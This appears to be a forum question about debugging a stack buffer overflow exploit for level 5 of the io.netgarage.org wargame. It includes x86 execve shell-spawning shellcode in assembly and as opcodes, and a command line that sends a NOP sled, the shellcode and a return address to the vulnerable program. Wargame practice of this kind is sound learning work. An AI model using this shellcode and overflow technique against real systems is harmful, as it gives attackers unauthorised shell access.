I am currently trying to complete Level5 of the io.netgarage.org wargame. To complete it i wrote the following asm payload:
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
which should spawn a shell by calling sys_execve, and it does. But only as long, as i don't use it as actuall payload.
As soon as i try to feed it to the vulnerable c programm, i get segfaulted. By inspecting it with gdb, i was able to pin the segfault to the line
mov edx, esp
Everything that should happen before (overwriting return address, NOP-Sled) actually works as intendet.
Additional Information:
- I get to OP-Codes by compiling above asm code with
nasm -f elf32 file.asm -o file.o
objdump -d file.o
- I call the vulnerable programm like this:
/levels/level05 $(python -c 'print "\x90"*115 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\xa0\xfb\xff\xbf"')
- The return address 0xbffffba0 i got by inspecting the values of the stack with gdb - My current assumption is that it has to do something with the stack, because using a script i found online, utilizing a jmp-call-pop pattern, worked seemingly correctly
Thank you,
tarkes